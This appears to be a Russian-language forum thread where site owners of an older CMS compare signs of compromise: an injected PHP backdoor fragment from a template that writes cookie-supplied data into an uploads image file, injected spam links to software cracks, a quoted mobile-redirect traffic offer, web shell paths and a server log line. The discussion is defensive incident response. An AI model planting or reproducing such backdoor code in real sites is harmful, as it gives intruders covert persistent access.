Katerina, можно пример посмотреть, что у себя проверить?Один код нашла в template, который запрашивает USER_AGENT.
<?php if(@$_COOKIE['pplicookie'] != 'presscookie') { @$doma_in = @file_get_contents('/var/www/p[b]имя сайта[/b]/data/www/[b]имя сайта[/b].ru/upload/117.jpg'); if (@$_COOKIE['hphpallcookie']) { @file_put_contents ('/var/www/p[b]имя сайта[/b]/data/www/[b]имя сайта[/b].ru/upload/117.jpg',@$_COOKIE['hphpallcookie']); } ?>
Я не знаю, что это такое… Там же узнала про картинку 117.
зайдите в логи сервера и сделайте поиск по имени файла в котором эти изменения.надо узнать с какого айпи он запрашивался. далее искать какие еще файлы запрашивались с этого айпи и есть вероятность что увидете через что был вход. а если ломал школоло и работал с одной прокси, то по истории увидите и способ как он загрузил шелл.
вот такое
----------------
<a href="://.ru/components/cats/viewforum-2-1.html">Кряки</a><br> <ul> <a href="://.ru/components/cats/viewtopic-729529.html">Nero 7 11 10 0 серийный номер</a><br> <a href="://.ru/components/cats/viewtopic-369376.html">Creck бесплатно Alcohol120 retail 1 9 8 7612</a><br> <a href="://.ru/components/cats/viewtopic-44641.html">Crack 401111</a><br> <a href="://.ru/components/cats/viewtopic-38178.html">Драйвера ati radeon x 300 x550 x1050</a><br> <a href="://.ru/components/cats/viewtopic-224401.html">Алкоголь 120 с кряком</a><br> <a href="://.ru/components/cats/viewtopic-122677.html">Divinity 2 русификатор звука</a><br> <a href="://.ru/components/cats/viewtopic-808205.html">ITE IT8212 ATA RAID Controller win7</a><br> <a href="://.ru/components/cats/viewtopic-101149.html">Драйвера бесплатно xerox phaser 3117</a><br> <a href="://.ru/components/cats/viewtopic-744192.html">Дрова на Nokia 5300</a><br> <a href="://.ru/components/cats/viewtopic-139094.html">Кодеки на wmp xp mp4</a><br> <a href="://.ru/components/cats/viewtopic-936116.html">Качай ACID Pro</a><br>
-------------------------------
Добрый день. Мы хотим предложить для вашего сайта **********.com получить дополнительную ежедневную прибыль в партнерской системе ******.ru
В среднем ваш сайт посещает 600 пользователей в сутки, 5-10% из которых заходят с мобильных телефонов.
Мобильные посетители практически бесполезны для веб-сайта — они не качают файлы и не кликают на рекламу. Монетизировать их в рамках веб-сайта довольно сложно.
Мы готовы оплачивать данный тип трафика и перенаправлять его тематическим рекламодателям в сфере мобильного интернета. По нашим расчетам, дополнительный доход от Вашего сайта при текущей посещаемости составит около 36 руб. в день!
Преимущества работы с нами:
— Мы выкупаем мобильных пользователей абсолютно всех стран на самых выгодных условиях, благодаря сотрудничеству с крупнейшими рекламодателями
— Никакой рекламы и ссылок на Вашем сайте. Код всего-лишь перенаправляет мобильных пользователей. При этом он полностью безопасен для поисковых систем
— Еженедельные автоматические выплаты на WebMoney без задержек. Досрочные выплаты тоже возможны
— Детальная статистика выкупленного трафика
— Простая установка кода, которая занимает не более 30 секунд
— Отзывчивая техническая поддержка
-------------------------------
Уже и сервисы скупки такого трафика существуют.
похоже что взломы идут через дырявый fckeditor буть он неладен.
файл загружен 27 января этого года. были какие-то исправления безопасности с того времени связанные редактором? я так понимаю это еще на 1.7 версии его подгрузии. а вот первый найденый шелл тот от июня месяца, то-есть уже на 1.8 версии. но тут не факт что смарти виноват, так как вроде он на последней стабильной версии своей ветки.
у меня они оказывается давно сидят, я уже начинал чувствовать себя в гостях :)
яндекс сам меня предупредил и потом только я проверил
третий шел.
28/10/10 russian.php в папке languages
/wysiwyg/editor/images/metadata.jpg — еще один шелл.
28/10/10 russian.php в папке languages
Нашли шелл в cgi-bin — Файл test.pl
/includes/smarty/libs/fcuk
Line 11025: 94.228.220.68 — - [04/Dec/2011:22:42:22 +0400] "GET /upload/userfiles/211/hey.php HTTP/1.0" 200 145901
грузанул через профиль файлик и пошел шастать по системе.
какой вывод? а вывод один — если у вас стоит версия 1.8, сходите в магазин и купите ченить к чаю — гости к вам часто будут ходить